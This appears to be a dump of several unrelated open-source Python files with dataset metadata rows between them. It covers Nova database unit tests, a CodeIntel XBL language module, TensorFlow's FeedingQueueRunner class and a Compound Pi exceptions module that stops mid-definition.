self.assertEqual(result1['uuid'], result2['uuid'])
ignored_keys = ['id', 'uuid', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result2, values, ignored_keys)
def test_instance_group_delete(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
db.instance_group_delete(self.context, result['uuid'])
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_delete, self.context,
result['uuid'])
def test_instance_group_get_nonexistent(self):
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_get,
self.context,
'nonexistent')
def test_instance_group_delete_nonexistent(self):
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_delete,
self.context,
'nonexistent')
def test_instance_group_get_all(self):
groups = db.instance_group_get_all(self.context)
self.assertEqual(0, len(groups))
value = self._get_default_values()
result1 = self._create_instance_group(self.context, value)
groups = db.instance_group_get_all(self.context)
self.assertEqual(1, len(groups))
value = self._get_default_values()
result2 = self._create_instance_group(self.context, value)
groups = db.instance_group_get_all(self.context)
results = [result1, result2]
self._assertEqualListsOfObjects(results, groups)
def test_instance_group_get_all_by_project_id(self):
groups = db.instance_group_get_all_by_project_id(self.context,
'invalid_project_id')
self.assertEqual(0, len(groups))
values = self._get_default_values()
result1 = self._create_instance_group(self.context, values)
groups = db.instance_group_get_all_by_project_id(self.context,
'fake_project')
self.assertEqual(1, len(groups))
values = self._get_default_values()
values['project_id'] = 'new_project_id'
result2 = self._create_instance_group(self.context, values)
groups = db.instance_group_get_all(self.context)
results = [result1, result2]
self._assertEqualListsOfObjects(results, groups)
projects = [{'name': 'fake_project', 'value': [result1]},
{'name': 'new_project_id', 'value': [result2]}]
for project in projects:
groups = db.instance_group_get_all_by_project_id(self.context,
project['name'])
self._assertEqualListsOfObjects(project['value'], groups)
def test_instance_group_update(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
ignored_keys = ['id', 'uuid', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self.assertTrue(uuidutils.is_uuid_like(result['uuid']))
id = result['uuid']
values = self._get_default_values()
values['name'] = 'new_fake_name'
db.instance_group_update(self.context, id, values)
result = db.instance_group_get(self.context, id)
self.assertEqual(result['name'], 'new_fake_name')
# update update members
values = self._get_default_values()
members = ['instance_id1', 'instance_id2']
values['members'] = members
db.instance_group_update(self.context, id, values)
result = db.instance_group_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(result['members'], members)
# update update policies
values = self._get_default_values()
policies = ['policy1', 'policy2']
values['policies'] = policies
db.instance_group_update(self.context, id, values)
result = db.instance_group_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(result['policies'], policies)
# test invalid ID
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_update, self.context,
'invalid_id', values)
def test_instance_group_get_by_instance(self):
values = self._get_default_values()
group1 = self._create_instance_group(self.context, values)
members = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, group1.uuid, members)
group2 = db.instance_group_get_by_instance(self.context,
'instance_id1')
self.assertEqual(group2.uuid, group1.uuid)
class InstanceGroupMembersDBApiTestCase(InstanceGroupDBApiTestCase):
def test_instance_group_members_on_create(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
members = ['instance_id1', 'instance_id2']
result = self._create_instance_group(self.context, values,
members=members)
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self._assertEqualListsOfPrimitivesAsSets(result['members'], members)
def test_instance_group_members_add(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
members = db.instance_group_members_get(self.context, id)
self.assertEqual(members, [])
members2 = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, id, members2)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members2)
def test_instance_group_members_update(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
members2 = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, id, members2)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members2)
# check add with existing keys
members3 = ['instance_id1', 'instance_id2', 'instance_id3']
db.instance_group_members_add(self.context, id, members3)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members3)
def test_instance_group_members_delete(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
result = self._create_instance_group(self.context, values)
id = result['uuid']
members3 = ['instance_id1', 'instance_id2', 'instance_id3']
db.instance_group_members_add(self.context, id, members3)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members3)
for instance_id in members3[:]:
db.instance_group_member_delete(self.context, id, instance_id)
members3.remove(instance_id)
members = db.instance_group_members_get(self.context, id)
self._assertEqualListsOfPrimitivesAsSets(members, members3)
def test_instance_group_members_invalid_ids(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
id = result['uuid']
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_members_get,
self.context, 'invalid')
self.assertRaises(exception.InstanceGroupNotFound,
db.instance_group_member_delete, self.context,
'invalidid', 'instance_id1')
members = ['instance_id1', 'instance_id2']
db.instance_group_members_add(self.context, id, members)
self.assertRaises(exception.InstanceGroupMemberNotFound,
db.instance_group_member_delete,
self.context, id, 'invalid_id')
class InstanceGroupPoliciesDBApiTestCase(InstanceGroupDBApiTestCase):
def test_instance_group_policies_on_create(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
policies = ['policy1', 'policy2']
result = self._create_instance_group(self.context, values,
policies=policies)
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self._assertEqualListsOfPrimitivesAsSets(result['policies'], policies)
class PciDeviceDBApiTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(PciDeviceDBApiTestCase, self).setUp()
self.user_id = 'fake_user'
self.project_id = 'fake_project'
self.context = context.RequestContext(self.user_id, self.project_id)
self.admin_context = context.get_admin_context()
self.ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._compute_node = None
def _get_fake_pci_devs(self):
return {'id': 3353,
'compute_node_id': 1,
'address': '0000:0f:08.7',
'vendor_id': '8086',
'product_id': '1520',
'numa_node': 1,
'dev_type': 'type-VF',
'dev_id': 'pci_0000:0f:08.7',
'extra_info': None,
'label': 'label_8086_1520',
'status': 'available',
'instance_uuid': '00000000-0000-0000-0000-000000000010',
'request_id': None,
}, {'id': 3356,
'compute_node_id': 1,
'address': '0000:0f:03.7',
'vendor_id': '8083',
'product_id': '1523',
'numa_node': 0,
'dev_type': 'type-VF',
'dev_id': 'pci_0000:0f:08.7',
'extra_info': None,
'label': 'label_8086_1520',
'status': 'available',
'instance_uuid': '00000000-0000-0000-0000-000000000010',
'request_id': None,
}
@property
def compute_node(self):
if self._compute_node is None:
self._compute_node = db.compute_node_create(self.admin_context, {
'vcpus': 0,
'memory_mb': 0,
'local_gb': 0,
'vcpus_used': 0,
'memory_mb_used': 0,
'local_gb_used': 0,
'hypervisor_type': 'fake',
'hypervisor_version': 0,
'cpu_info': 'fake',
})
return self._compute_node
def _create_fake_pci_devs(self):
v1, v2 = self._get_fake_pci_devs()
for i in v1, v2:
i['compute_node_id'] = self.compute_node['id']
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
db.pci_device_update(self.admin_context, v2['compute_node_id'],
v2['address'], v2)
return (v1, v2)
def test_pci_device_get_by_addr(self):
v1, v2 = self._create_fake_pci_devs()
result = db.pci_device_get_by_addr(self.admin_context, 1,
'0000:0f:08.7')
self._assertEqualObjects(v1, result, self.ignored_keys)
def test_pci_device_get_by_addr_not_found(self):
self._create_fake_pci_devs()
self.assertRaises(exception.PciDeviceNotFound,
db.pci_device_get_by_addr, self.admin_context,
1, '0000:0f:08:09')
def test_pci_device_get_by_id(self):
v1, v2 = self._create_fake_pci_devs()
result = db.pci_device_get_by_id(self.admin_context, 3353)
self._assertEqualObjects(v1, result, self.ignored_keys)
def test_pci_device_get_by_id_not_found(self):
self._create_fake_pci_devs()
self.assertRaises(exception.PciDeviceNotFoundById,
db.pci_device_get_by_id,
self.admin_context, 3354)
def test_pci_device_get_all_by_node(self):
v1, v2 = self._create_fake_pci_devs()
results = db.pci_device_get_all_by_node(self.admin_context, 1)
self._assertEqualListsOfObjects(results, [v1, v2], self.ignored_keys)
def test_pci_device_get_all_by_node_empty(self):
v1, v2 = self._get_fake_pci_devs()
results = db.pci_device_get_all_by_node(self.admin_context, 9)
self.assertEqual(len(results), 0)
def test_pci_device_get_by_instance_uuid(self):
v1, v2 = self._create_fake_pci_devs()
v1['status'] = 'allocated'
v2['status'] = 'allocated'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
db.pci_device_update(self.admin_context, v2['compute_node_id'],
v2['address'], v2)
results = db.pci_device_get_all_by_instance_uuid(
self.context,
'00000000-0000-0000-0000-000000000010')
self._assertEqualListsOfObjects(results, [v1, v2], self.ignored_keys)
def test_pci_device_get_by_instance_uuid_check_status(self):
v1, v2 = self._create_fake_pci_devs()
v1['status'] = 'allocated'
v2['status'] = 'claimed'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
db.pci_device_update(self.admin_context, v2['compute_node_id'],
v2['address'], v2)
results = db.pci_device_get_all_by_instance_uuid(
self.context,
'00000000-0000-0000-0000-000000000010')
self._assertEqualListsOfObjects(results, [v1], self.ignored_keys)
def test_pci_device_update(self):
v1, v2 = self._create_fake_pci_devs()
v1['status'] = 'allocated'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
result = db.pci_device_get_by_addr(
self.admin_context, 1, '0000:0f:08.7')
self._assertEqualObjects(v1, result, self.ignored_keys)
v1['status'] = 'claimed'
db.pci_device_update(self.admin_context, v1['compute_node_id'],
v1['address'], v1)
result = db.pci_device_get_by_addr(
self.admin_context, 1, '0000:0f:08.7')
self._assertEqualObjects(v1, result, self.ignored_keys)
def test_pci_device_destroy(self):
v1, v2 = self._create_fake_pci_devs()
results = db.pci_device_get_all_by_node(self.admin_context,
self.compute_node['id'])
self._assertEqualListsOfObjects(results, [v1, v2], self.ignored_keys)
db.pci_device_destroy(self.admin_context, v1['compute_node_id'],
v1['address'])
results = db.pci_device_get_all_by_node(self.admin_context,
self.compute_node['id'])
self._assertEqualListsOfObjects(results, [v2], self.ignored_keys)
def test_pci_device_destroy_exception(self):
v1, v2 = self._get_fake_pci_devs()
self.assertRaises(exception.PciDeviceNotFound,
db.pci_device_destroy,
self.admin_context,
v1['compute_node_id'],
v1['address'])
class RetryOnDeadlockTestCase(test.TestCase):
def test_without_deadlock(self):
@oslo_db_api.wrap_db_retry(max_retries=5,
retry_on_deadlock=True)
def call_api(*args, **kwargs):
return True
self.assertTrue(call_api())
def test_raise_deadlock(self):
self.attempts = 2
@oslo_db_api.wrap_db_retry(max_retries=5,
retry_on_deadlock=True)
def call_api(*args, **kwargs):
while self.attempts:
self.attempts = self.attempts - 1
raise db_exc.DBDeadlock("fake exception")
return True
self.assertTrue(call_api())
class TestSqlalchemyTypesRepr(test_base.DbTestCase):
def setUp(self):
super(TestSqlalchemyTypesRepr, self).setUp()
meta = MetaData(bind=self.engine)
self.table = Table(
'cidr_tbl',
meta,
Column('id', Integer, primary_key=True),
Column('addr', col_types.CIDR())
)
self.table.create()
self.addCleanup(meta.drop_all)
def test_cidr_repr(self):
addrs = [('192.168.3.0/24', '192.168.3.0/24'),
('2001:db8::/64', '2001:db8::/64'),
('192.168.3.0', '192.168.3.0/32'),
('2001:db8::', '2001:db8::/128'),
(None, None)]
with self.engine.begin() as conn:
for i in addrs:
conn.execute(self.table.insert(), {'addr': i[0]})
query = self.table.select().order_by(self.table.c.id)
result = conn.execute(query)
for idx, row in enumerate(result):
self.assertEqual(addrs[idx][1], row.addr)
class TestMySQLSqlalchemyTypesRepr(TestSqlalchemyTypesRepr,
test_base.MySQLOpportunisticTestCase):
pass
class TestPostgreSQLSqlalchemyTypesRepr(TestSqlalchemyTypesRepr,
test_base.PostgreSQLOpportunisticTestCase):
pass
class TestDBInstanceTags(test.TestCase):
sample_data = {
'project_id': 'project1',
'hostname': 'example.com',
'host': 'h1',
'node': 'n1',
'metadata': {'mkey1': 'mval1', 'mkey2': 'mval2'},
'system_metadata': {'smkey1': 'smval1', 'smkey2': 'smval2'},
'info_cache': {'ckey': 'cvalue'}
}
def setUp(self):
super(TestDBInstanceTags, self).setUp()
self.user_id = 'user1'
self.project_id = 'project1'
self.context = context.RequestContext(self.user_id, self.project_id)
def _create_instance(self):
inst = db.instance_create(self.context, self.sample_data)
return inst['uuid']
def _get_tags_from_resp(self, tag_refs):
return [(t.resource_id, t.tag) for t in tag_refs]
def test_instance_tag_add(self):
uuid = self._create_instance()
tag = 'tag'
tag_ref = db.instance_tag_add(self.context, uuid, tag)
self.assertEqual(uuid, tag_ref.resource_id)
self.assertEqual(tag, tag_ref.tag)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the tag for the instance was added
tags = self._get_tags_from_resp(tag_refs)
self.assertEqual([(uuid, tag)], tags)
def test_instance_tag_add_duplication(self):
uuid = self._create_instance()
tag = 'tag'
for x in range(5):
db.instance_tag_add(self.context, uuid, tag)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the only one tag for the instance was added
tags = self._get_tags_from_resp(tag_refs)
self.assertEqual([(uuid, tag)], tags)
def test_instance_tag_set(self):
uuid = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
tag3 = 'tag3'
tag4 = 'tag4'
# Set tags to the instance
db.instance_tag_set(self.context, uuid, [tag1, tag2])
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the tags for the instance were set
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag1), (uuid, tag2)]
self.assertEqual(expected, tags)
# Set new tags to the instance
db.instance_tag_set(self.context, uuid, [tag3, tag4, tag2])
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
# Check the tags for the instance were replaced
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag3), (uuid, tag4), (uuid, tag2)]
self.assertEqual(set(expected), set(tags))
def test_instance_tag_get_by_instance_uuid(self):
uuid1 = self._create_instance()
uuid2 = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
tag3 = 'tag3'
db.instance_tag_add(self.context, uuid1, tag1)
db.instance_tag_add(self.context, uuid2, tag1)
db.instance_tag_add(self.context, uuid2, tag2)
db.instance_tag_add(self.context, uuid2, tag3)
# Check the tags for the first instance
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid1)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid1, tag1)]
self.assertEqual(expected, tags)
# Check the tags for the second instance
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid2)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid2, tag1), (uuid2, tag2), (uuid2, tag3)]
self.assertEqual(expected, tags)
def test_instance_tag_get_by_instance_uuid_no_tags(self):
uuid = self._create_instance()
self.assertEqual([], db.instance_tag_get_by_instance_uuid(self.context,
uuid))
def test_instance_tag_delete(self):
uuid = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
db.instance_tag_add(self.context, uuid, tag1)
db.instance_tag_add(self.context, uuid, tag2)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag1), (uuid, tag2)]
# Check the tags for the instance were added
self.assertEqual(expected, tags)
db.instance_tag_delete(self.context, uuid, tag1)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag2)]
self.assertEqual(expected, tags)
def test_instance_tag_delete_non_existent(self):
uuid = self._create_instance()
self.assertRaises(exception.InstanceTagNotFound,
db.instance_tag_delete, self.context, uuid, 'tag')
def test_instance_tag_delete_all(self):
uuid = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
db.instance_tag_add(self.context, uuid, tag1)
db.instance_tag_add(self.context, uuid, tag2)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
expected = [(uuid, tag1), (uuid, tag2)]
# Check the tags for the instance were added
self.assertEqual(expected, tags)
db.instance_tag_delete_all(self.context, uuid)
tag_refs = db.instance_tag_get_by_instance_uuid(self.context, uuid)
tags = self._get_tags_from_resp(tag_refs)
self.assertEqual([], tags)
def test_instance_tag_exists(self):
uuid = self._create_instance()
tag1 = 'tag1'
tag2 = 'tag2'
db.instance_tag_add(self.context, uuid, tag1)
# NOTE(snikitin): Make sure it's actually a bool
self.assertEqual(True, db.instance_tag_exists(self.context, uuid,
tag1))
self.assertEqual(False, db.instance_tag_exists(self.context, uuid,
tag2))
def test_instance_tag_add_to_non_existing_instance(self):
self._create_instance()
self.assertRaises(exception.InstanceNotFound, db.instance_tag_add,
self.context, 'fake_uuid', 'tag')
def test_instance_tag_set_to_non_existing_instance(self):
self._create_instance()
self.assertRaises(exception.InstanceNotFound, db.instance_tag_set,
self.context, 'fake_uuid', ['tag1', 'tag2'])
def test_instance_tag_get_from_non_existing_instance(self):
self._create_instance()
self.assertRaises(exception.InstanceNotFound,
db.instance_tag_get_by_instance_uuid, self.context,
'fake_uuid')
def test_instance_tag_delete_from_non_existing_instance(self):
self._create_instance()
self.assertRaises(exception.InstanceNotFound, db.instance_tag_delete,
self.context, 'fake_uuid', 'tag')
def test_instance_tag_delete_all_from_non_existing_instance(self):
self._create_instance()
self.assertRaises(exception.InstanceNotFound,
db.instance_tag_delete_all,
self.context, 'fake_uuid')
def test_instance_tag_exists_non_existing_instance(self):
self._create_instance()
self.assertRaises(exception.InstanceNotFound,
db.instance_tag_exists,
self.context, 'fake_uuid', 'tag')
| apache-2.0 | 926,845,915,533,690,500 | 43.990505 | 79 | 0.567316 | false |
anisku11/sublimeku | Packages/CodeComplice/libs/codeintel2/lang_xbl.py | 10 | 3211 | #!/usr/bin/env python
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License
# Version 1.1 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
#
# The Original Code is Komodo code.
#
# The Initial Developer of the Original Code is ActiveState Software Inc.
# Portions created by ActiveState Software Inc are Copyright (C) 2000-2007
# ActiveState Software Inc. All Rights Reserved.
#
# Contributor(s):
# ActiveState Software Inc
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****
"""XBL support for codeintel"""
import logging
from codeintel2.common import *
from codeintel2.udl import UDLLexer, UDLBuffer, UDLCILEDriver, XMLParsingBufferMixin
#---- globals
lang = "XBL"
log = logging.getLogger("codeintel.xbl")
#---- language support
class XBLLexer(UDLLexer):
lang = lang
class XBLBuffer(UDLBuffer, XMLParsingBufferMixin):
lang = lang
m_lang = "XML"
css_lang = "CSS"
csl_lang = "JavaScript"
# Characters that should close an autocomplete UI:
# - wanted for XML completion: ">'\" "
# - wanted for CSS completion: " ('\";},.>"
# - wanted for JS completion: "~`!@#%^&*()-=+{}[]|\\;:'\",.<>?/ "
# - dropping ':' because I think that may be a problem for XML tag
# completion with namespaces (not sure of that though)
# - dropping '[' because need for "<!<|>" -> "<![CDATA[" cpln
cpln_stop_chars = "'\" (;},~`!@#%^&*()-=+{}]|\\;,.<>?/"
# This gives global window completions but does not produce cile
# information, so completions for local variables and functions will
# not work.
class XBLCILEDriver(UDLCILEDriver):
lang = lang
csl_lang = "JavaScript"
#---- registration
def register(mgr):
"""Register language support with the Manager."""
mgr.set_lang_info(lang,
silvercity_lexer=XBLLexer(),
buf_class=XBLBuffer,
import_handler_class=None,
cile_driver_class=XBLCILEDriver,
is_cpln_lang=True)
| mit | 4,609,207,670,450,474,000 | 35.488636 | 84 | 0.680162 | false |
handroissuazo/tensorflow | tensorflow/contrib/learn/python/learn/dataframe/queues/feeding_queue_runner.py | 37 | 6897 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A `QueueRunner` that takes a feed function as an argument."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from tensorflow.python.framework import errors
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import queue_runner as qr
class FeedingQueueRunner(qr.QueueRunner):
"""A queue runner that allows the feeding of values such as numpy arrays."""
def __init__(self, queue=None, enqueue_ops=None, close_op=None,
cancel_op=None, feed_fns=None,
queue_closed_exception_types=None):
"""Initialize the queue runner.
For further documentation, see `queue_runner.py`. Note that
`FeedingQueueRunner` does not support construction from protobuffer nor
serialization to protobuffer.
Args:
queue: A `Queue`.
enqueue_ops: List of enqueue ops to run in threads later.
close_op: Op to close the queue. Pending enqueue ops are preserved.
cancel_op: Op to close the queue and cancel pending enqueue ops.
feed_fns: a list of functions that return a dictionary mapping fed
`Tensor`s to values. Must be the same length as `enqueue_ops`.
queue_closed_exception_types: Optional tuple of Exception types that
indicate that the queue has been closed when raised during an enqueue
operation. Defaults to
`(tf.errors.OutOfRangeError, tf.errors.CancelledError)`.
Raises:
ValueError: `feed_fns` is not `None` and has different length than
`enqueue_ops`.
"""
if queue_closed_exception_types is None:
queue_closed_exception_types = (
errors.OutOfRangeError, errors.CancelledError)
super(FeedingQueueRunner, self).__init__(
queue, enqueue_ops, close_op,
cancel_op, queue_closed_exception_types=queue_closed_exception_types)
if feed_fns is None:
self._feed_fns = [None for _ in enqueue_ops]
else:
if len(feed_fns) != len(enqueue_ops):
raise ValueError(
"If feed_fns is not None, it must have the same length as "
"enqueue_ops.")
self._feed_fns = feed_fns
# pylint: disable=broad-except
def _run(self, sess, enqueue_op, feed_fn, coord=None):
"""Execute the enqueue op in a loop, close the queue in case of error.
Args:
sess: A `Session`.
enqueue_op: The `Operation` to run.
feed_fn: the feed function to pass to `sess.run`.
coord: Optional `Coordinator` object for reporting errors and checking
for stop conditions.
"""
# TODO(jamieas): Reduce code duplication with `QueueRunner`.
if coord:
coord.register_thread(threading.current_thread())
decremented = False
try:
while True:
if coord and coord.should_stop():
break
try:
feed_dict = None if feed_fn is None else feed_fn()
sess.run(enqueue_op, feed_dict=feed_dict)
except (errors.OutOfRangeError, errors.CancelledError):
# This exception indicates that a queue was closed.
with self._lock:
self._runs_per_session[sess] -= 1
decremented = True
if self._runs_per_session[sess] == 0:
try:
sess.run(self._close_op)
except Exception as e:
# Intentionally ignore errors from close_op.
logging.vlog(1, "Ignored exception: %s", str(e))
return
except Exception as e:
# This catches all other exceptions.
if coord:
coord.request_stop(e)
else:
logging.error("Exception in QueueRunner: %s", str(e))
with self._lock:
self._exceptions_raised.append(e)
raise
finally:
# Make sure we account for all terminations: normal or errors.
if not decremented:
with self._lock:
self._runs_per_session[sess] -= 1
def create_threads(self, sess, coord=None, daemon=False, start=False):
"""Create threads to run the enqueue ops for the given session.
This method requires a session in which the graph was launched. It creates
a list of threads, optionally starting them. There is one thread for each
op passed in `enqueue_ops`.
The `coord` argument is an optional coordinator, that the threads will use
to terminate together and report exceptions. If a coordinator is given,
this method starts an additional thread to close the queue when the
coordinator requests a stop.
If previously created threads for the given session are still running, no
new threads will be created.
Args:
sess: A `Session`.
coord: Optional `Coordinator` object for reporting errors and checking
stop conditions.
daemon: Boolean. If `True` make the threads daemon threads.
start: Boolean. If `True` starts the threads. If `False` the
caller must call the `start()` method of the returned threads.
Returns:
A list of threads.
"""
with self._lock:
try:
if self._runs_per_session[sess] > 0:
# Already started: no new threads to return.
return []
except KeyError:
# We haven't seen this session yet.
pass
self._runs_per_session[sess] = len(self._enqueue_ops)
self._exceptions_raised = []
ret_threads = [threading.Thread(target=self._run,
args=(sess, op, feed_fn, coord))
for op, feed_fn in zip(self._enqueue_ops, self._feed_fns)]
if coord:
ret_threads.append(threading.Thread(target=self._close_on_stop,
args=(sess, self._cancel_op, coord)))
for t in ret_threads:
if daemon:
t.daemon = True
if start:
t.start()
return ret_threads
def _init_from_proto(self, queue_runner_def):
raise NotImplementedError(
"{} does not support initialization from proto.".format(type(
self).__name__))
def to_proto(self):
raise NotImplementedError(
"{} does not support serialization to proto.".format(type(
self).__name__))
| apache-2.0 | 4,977,298,174,269,079,000 | 37.316667 | 80 | 0.641438 | false |
waveform80/compoundpi | compoundpi/exc.py | 1 | 7202 | # vim: set et sw=4 sts=4 fileencoding=utf-8:
# Copyright 2014 Dave Jones <[email protected]>.
#
# This file is part of compoundpi.
#
# compoundpi is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 2 of the License, or (at your option) any later
# version.
#
# compoundpi is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# compoundpi. If not, see <http://www.gnu.org/licenses/>.
"Defines all exceptions and warnings used by Compound Pi"
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
str = type('')
class CompoundPiWarning(Warning):
"Base class for warnings raised by the Compound Pi suite"
class CompoundPiClientWarning(CompoundPiWarning):
"Warning raised when the Compound Pi client does something unexpected"
def __init__(self, address, msg):
super(CompoundPiClientWarning, self).__init__(
'%s: %s' % (address, msg))
self.address = address
class CompoundPiServerWarning(CompoundPiWarning):
"Warning raised when a Compound Pi server does something unexpected"
def __init__(self, address, msg):
super(CompoundPiServerWarning, self).__init__(
'%s: %s' % (address, msg))
self.address = address
class CompoundPiWrongPort(CompoundPiServerWarning):
"Warning raised when packets are received from the wrong port"
def __init__(self, address, port):
super(CompoundPiWrongPort, self).__init__(
address, 'response from wrong port %d' % port)
class CompoundPiUnknownAddress(CompoundPiServerWarning):
"Warning raised when a packet is received from an unexpected address"
def __init__(self, address):
super(CompoundPiUnknownAddress, self).__init__(
address, 'unknown server')
class CompoundPiMultiResponse(CompoundPiServerWarning):
"Warning raised when multiple responses are received"
def __init__(self, address):
super(CompoundPiMultiResponse, self).__init__(
address, 'multiple responses received')
class CompoundPiBadResponse(CompoundPiServerWarning):
"Warning raised when a response is badly formed"
def __init__(self, address):
super(CompoundPiBadResponse, self).__init__(
address, 'badly formed response')
class CompoundPiStaleResponse(CompoundPiServerWarning):
"Warning raised when a stale response (old sequence number) is received"
def __init__(self, address):
super(CompoundPiStaleResponse, self).__init__(
address, 'stale response')
class CompoundPiFutureResponse(CompoundPiServerWarning):
"Warning raised when a response with a future sequence number is received"
def __init__(self, address):
super(CompoundPiFutureResponse, self).__init__(
address, 'future response')
class CompoundPiWrongVersion(CompoundPiServerWarning):
"Warning raised when a server reports an incompatible version"
def __init__(self, address, version):
super(CompoundPiWrongVersion, self).__init__(
address, 'wrong version "%s"' % version)
self.version = version
class CompoundPiHelloError(CompoundPiServerWarning):
"Warning raised when a server reports an error in response to HELLO"
def __init__(self, address, error):
super(CompoundPiHelloError, self).__init__(address, error)
self.error = error
class CompoundPiStaleSequence(CompoundPiClientWarning):
def __init__(self, address, seqno):
super(CompoundPiStaleSequence, self).__init__(
address, 'Stale sequence number %d' % seqno)
class CompoundPiStaleClientTime(CompoundPiClientWarning):
def __init__(self, address, ts):
super(CompoundPiStaleClientTime, self).__init__(
address, 'Stale client time %f' % ts)
class CompoundPiInvalidClient(CompoundPiClientWarning):
def __init__(self, address):
super(CompoundPiInvalidClient, self).__init__(
address, 'Invalid client or protocol error')
class CompoundPiError(Exception):
"Base class for errors raised by the Compound Pi suite"
class CompoundPiClientError(CompoundPiError):
"Base class for client-side errors (configuration, usage, etc.)"
class CompoundPiServerError(CompoundPiError):
"Base class for server-side errors which associates an address with the message"
def __init__(self, address, msg):
super(CompoundPiServerError, self).__init__('%s: %s' % (address, msg))
self.address = address
class CompoundPiTransactionFailed(CompoundPiError):
"Compound exception which represents all errors encountered in a transaction"
def __init__(self, errors, msg=None):
if msg is None:
msg = '%d errors encountered while executing' % len(errors)
msg = '\n'.join([msg] + [str(e) for e in errors])
super(CompoundPiTransactionFailed, self).__init__(msg)
self.errors = errors
class CompoundPiNoServers(CompoundPiClientError):
"Exception raised when a command is execute with no servers defined"
def __init__(self):
super(CompoundPiNoServers, self).__init__('no servers defined')
class CompoundPiUndefinedServers(CompoundPiClientError):
"Exception raised when a transaction is attempted with undefined servers"
def __init__(self, addresses):
